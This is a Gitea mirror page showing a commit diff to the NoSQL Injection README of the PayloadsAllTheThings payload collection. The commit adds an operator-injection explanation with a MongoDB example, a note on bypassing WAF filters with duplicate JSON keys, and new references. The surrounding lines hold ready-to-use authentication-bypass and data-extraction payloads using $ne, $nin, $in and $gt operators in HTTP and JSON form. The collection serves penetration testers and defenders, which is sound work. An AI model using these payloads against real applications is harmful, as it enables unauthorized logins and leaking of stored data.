gitea-mirror/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2025-12-06 04:40:58 -08:00
Code Issues Packages Projects Releases Wiki Activity

NoSQL injection WAF

Browse Source
This commit is contained in:
Swissky
2025-04-01 20:22:10 +02:00
parent f344fa50a6
commit 8379e65ce0
1 changed files with 44 additions and 2 deletions
Download Patch File Download Diff File Expand all files Collapse all files

46
NoSQL Injection/README.md
View File

@@ -6,9 +6,11 @@
* [Tools](#tools) * [Tools](#tools)
* [Methodology](#methodology) * [Methodology](#methodology)
* [Operator Injection](#operator-injection)
* [Authentication Bypass](#authentication-bypass) * [Authentication Bypass](#authentication-bypass)
* [Extract Length Information](#extract-length-information) * [Extract Length Information](#extract-length-information)
* [Extract Data Information](#extract-data-information) * [Extract Data Information](#extract-data-information)
* [WAF and Filters](#waf-and-filters)
* [Blind NoSQL](#blind-nosql) * [Blind NoSQL](#blind-nosql)
* [POST with JSON Body](#post-with-json-body) * [POST with JSON Body](#post-with-json-body)
* [POST with urlencoded Body](#post-with-urlencoded-body) * [POST with urlencoded Body](#post-with-urlencoded-body)
@@ -24,11 +26,37 @@
## Methodology ## Methodology
NoSQL injection occurs when an attacker manipulates queries by injecting malicious input into a NoSQL database query. Unlike SQL injection, NoSQL injection often exploits JSON-based queries and operators like `$ne`, `$gt`, `$regex`, or `$where` in MongoDB.
### Operator Injection
| Operator | Description |
| -------- | ------------------ |
| $ne | not equal |
| $regex | regular expression |
| $gt | greater than |
| $lt | lower than |
| $nin | not in |
Example: A web application has a product search feature
```js
db.products.find({ "price": userInput })
```
An attacker can inject a NoSQL query: `{ "$gt": 0 }`.
```js
db.products.find({ "price": { "$gt": 0 } })
```
Instead of returning a specific product, the database returns all products with a price greater than zero, leaking data.
### Authentication Bypass ### Authentication Bypass
Basic authentication bypass using not equal (`$ne`) or greater (`$gt`) Basic authentication bypass using not equal (`$ne`) or greater (`$gt`)
* in HTTP data * HTTP data
```ps1 ```ps1
username[$ne]=toto&password[$ne]=toto username[$ne]=toto&password[$ne]=toto
@@ -37,7 +65,7 @@ Basic authentication bypass using not equal (`$ne`) or greater (`$gt`)
login[$nin][]=admin&login[$nin][]=test&pass[$ne]=toto login[$nin][]=admin&login[$nin][]=test&pass[$ne]=toto
``` ```
* in JSON data * JSON data
```json ```json
{"username": {"$ne": null}, "password": {"$ne": null}} {"username": {"$ne": null}, "password": {"$ne": null}}
@@ -84,6 +112,18 @@ Extract data with "`$in`" query operator.
{"username":{"$in":["Admin", "4dm1n", "admin", "root", "administrator"]},"password":{"$gt":""}} {"username":{"$in":["Admin", "4dm1n", "admin", "root", "administrator"]},"password":{"$gt":""}}
``` ```
### WAF and Filters
**Remove pre-condition**:
In MongoDB, if a document contains duplicate keys, only the last occurrence of the key will take precedence.
```js
{"id":"10", "id":"100"}
```
In this case, the final value of "id" will be "100".
## Blind NoSQL ## Blind NoSQL
### POST with JSON Body ### POST with JSON Body
@@ -198,8 +238,10 @@ end
## References ## References
* [Burp-NoSQLiScanner - matrix - January 30, 2021](https://github.com/matrix/Burp-NoSQLiScanner/blob/main/src/burp/BurpExtender.java) * [Burp-NoSQLiScanner - matrix - January 30, 2021](https://github.com/matrix/Burp-NoSQLiScanner/blob/main/src/burp/BurpExtender.java)
* [Getting rid of pre- and post-conditions in NoSQL injections - Reino Mostert - March 11, 2025](https://sensepost.com/blog/2025/getting-rid-of-pre-and-post-conditions-in-nosql-injections/)
* [Les NOSQL injections Classique et Blind: Never trust user input - Geluchat - February 22, 2015](https://www.dailysecurity.fr/nosql-injections-classique-blind/) * [Les NOSQL injections Classique et Blind: Never trust user input - Geluchat - February 22, 2015](https://www.dailysecurity.fr/nosql-injections-classique-blind/)
* [MongoDB NoSQL Injection with Aggregation Pipelines - Soroush Dalili (@irsdl) - June 23, 2024](https://soroush.me/blog/2024/06/mongodb-nosql-injection-with-aggregation-pipelines/) * [MongoDB NoSQL Injection with Aggregation Pipelines - Soroush Dalili (@irsdl) - June 23, 2024](https://soroush.me/blog/2024/06/mongodb-nosql-injection-with-aggregation-pipelines/)
* [NoSQL error-based injection - Reino Mostert - March 15, 2025](https://sensepost.com/blog/2025/nosql-error-based-injection/)
* [NoSQL Injection in MongoDB - Zanon - July 17, 2016](https://zanon.io/posts/nosql-injection-in-mongodb) * [NoSQL Injection in MongoDB - Zanon - July 17, 2016](https://zanon.io/posts/nosql-injection-in-mongodb)
* [NoSQL injection wordlists - cr0hn - May 5, 2021](https://github.com/cr0hn/nosqlinjection_wordlists) * [NoSQL injection wordlists - cr0hn - May 5, 2021](https://github.com/cr0hn/nosqlinjection_wordlists)
* [Testing for NoSQL injection - OWASP - May 2, 2023](https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05.6-Testing_for_NoSQL_Injection) * [Testing for NoSQL injection - OWASP - May 2, 2023](https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05.6-Testing_for_NoSQL_Injection)